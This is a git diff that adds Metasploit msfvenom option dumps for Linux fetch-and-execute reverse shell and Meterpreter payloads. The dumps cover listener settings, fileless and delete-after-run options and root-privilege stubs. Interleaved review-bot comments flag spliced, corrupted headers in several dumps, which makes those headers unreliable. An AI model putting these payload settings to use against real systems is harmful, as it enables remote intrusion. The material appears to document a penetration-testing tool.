@@ -0,0 +1,92 @@ + + Name: HTTPS Fetch, Linux Command Shell, Reverse TCP Inline (IPv6) + Module: payload/cmd/linux/https/x86/shell_reverse_tcp_ipv6 + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 110 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Matteo Malvica + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME SiQfKQjTuo no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x86 payload from an HTTPS server. 
+ Connect back to attacker and spawn a command shell over IPv6 + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the 
msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-aarch64-meterpreter-reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-aarch64-meterpreter-reverse_tcp.txt new file mode 100644 index 0000000..b809c57 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-aarch64-meterpreter-reverse_tcp.txt 
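Review bot: the `FETCH_FILELESS` description in this hunk has unbalanced parentheses: "requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)" opens two and closes one, so the Accepted list reads as part of the Python clause; the same string appears in the IPv4 file and the TFTP files, so fix it once in the module description rather than in each dump. The `AppendExit` row here has the same copied `PrependChrootBreak` description as the IPv4 file, and `FETCH_FILENAME SiQfKQjTuo` is again a per-run random value.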
@@ -0,0 +1,100 @@ + + Name: TFTP Fetch, Reverse TCP Stager + Module: payload/cmd/linux/tftp/aarch64/meterpreter/reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 102 + Rank: Norma +Evasion options for payload/cmd/linux/tftp/aarch64/meterpreter/reverse_tcp: +========================= + +ic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME POgSWdCh no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an AARCH64 payload from a TFTP server. + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see 
https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-aarch64-meterpreter_reverse_http.txt b/msfvenom/payload_options/cmd-linux-tftp-aarch64-meterpreter_reverse_http.txt new file mode 100644 index 0000000..8cfc2f5 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-aarch64-meterpreter_reverse_http.txt 
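Review bot: the header block of this hunk is corrupted and the file should be regenerated, not merged: `Rank: Norma` is cut mid-word, the `Evasion options for payload/cmd/linux/tftp/aarch64/meterpreter/reverse_tcp:` banner with its `====` rule sits where `Provided by:` should be, and `Basic options:` survives only as `ic options:`. That pattern is what two output streams written to the same file without coordination look like (for instance stdout and stderr redirected to the same path with two separate redirections, so one overwrites bytes of the other); capture the banner stream separately or discard it, and have the generator refuse to write a file that lacks a `Provided by:` and a `Basic options:` line so a damaged capture cannot be committed again.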
@@ -0,0 +1,104 @@ + + Name: TFTP Fetch + Module: payload/cmd/linux/tftp/aarch64/meterpreter_reverse_http + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + B +Evasion options for payload/cmd/linux/tftp/aarch64/meterpreter_reverse_http: +========================= + +@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME KfxKdpfRC no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an AARCH64 payload from a TFTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14_7_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A 
string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-aarch64-meterpreter_reverse_https.txt b/msfvenom/payload_options/cmd-linux-tftp-aarch64-meterpreter_reverse_https.txt new file mode 100644 index 0000000..4899e29 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-aarch64-meterpreter_reverse_https.txt 
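Review bot: same stream-splice corruption as the previous hunk at `Provided by: + B +Evasion options for payload/cmd/linux/tftp/aarch64/meterpreter_reverse_http:`, where the banner has overwritten the contributor list and left only the tail `@rapid7.com>` of an e-mail address; regenerate this file too. Two further rows break the one-option-per-row layout of the table: `HttpUnknownRequestResponse` has a multi-line default (its `It works!` body lands on lines of its own), and `HttpUserAgent` records a randomised browser string that differs from the one in the https twin in the next hunk, so both rows will churn on every regeneration; suggest the generator single-lines or elides such defaults.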
@@ -0,0 +1,106 @@ + + Name: TFTP Fetch + Module: payload/cmd/linux/tftp/aarch64/meterpreter_reverse_https + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 114 + Rank: Normal + +Provided by: + Br +Evasion options for payload/cmd/linux/tftp/aarch64/meterpreter_reverse_https: +========================= + +apid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME JckjTuNSvWVH no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an AARCH64 payload from a TFTP server. 
+ + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A 
string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-aarch64-meterpreter_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-aarch64-meterpreter_reverse_tcp.txt new file mode 100644 index 0000000..cf23118 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-aarch64-meterpreter_reverse_tcp.txt 
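Review bot: this hunk repeats the two defects of the preceding one: the `Br +Evasion options for payload/cmd/linux/tftp/aarch64/meterpreter_reverse_https:` splice over the contributor list (again leaving only `apid7.com>`), and the randomised `HttpUserAgent` default plus the multi-line `HttpUnknownRequestResponse` body; it should be regenerated together with the other two TFTP files once the capture is fixed. The `Description:` block also ends after `Fetch and execute an AARCH64 payload from a TFTP server.` with no connect-back sentence, unlike the reverse_tcp stager file earlier in the patch, so check whether the module description was truncated in the same capture fault or is genuinely shorter upstream.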
@@ -0,0 +1,97 @@ + + Name: TFTP Fetch + Module: payload/cmd/linux/tftp/aarch64/meterpreter_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 108 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Adam Cammack + Brent Cook + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME uwGHmAfsFE no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an AARCH64 payload from a TFTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the 
functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-aarch64-shell-reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-aarch64-shell-reverse_tcp.txt new file mode 100644 index 0000000..8978b06 --- /dev/null 
+++ b/msfvenom/payload_options/cmd-linux-tftp-aarch64-shell-reverse_tcp.txt 
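Review bot: in cmd-linux-tftp-aarch64-meterpreter_reverse_tcp.txt the FETCH_FILENAME default `uwGHmAfsFE` is a per-run random string, so this committed dump will change on every regeneration and produce noise diffs; normalise that column before writing the file (replace the random value with a fixed placeholder) or strip the FETCH_FILENAME row from the dump. Two upstream text issues are also preserved verbatim here and are worth reporting against the module rather than patching in the dump: the FETCH_FILELESS description has an unclosed parenthesis, `requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)`, and `Name: TFTP Fetch` is far less descriptive than the shell variants' names such as `TFTP Fetch, Linux dup2 Command Shell, Reverse TCP Stager`.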
@@ -0,0 +1,93 @@ + + Name: TFTP Fetch, Linux dup2 Command Shell, Reverse TCP Stager + Module: payload/cmd/linux/tftp/aarch64/shell/reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 111 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port +SHELL /bin/sh yes The shell to execute. + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME faFFztSLPkQ no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an AARCH64 payload from a TFTP server. + dup2 socket in x12, then execve. + + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. 
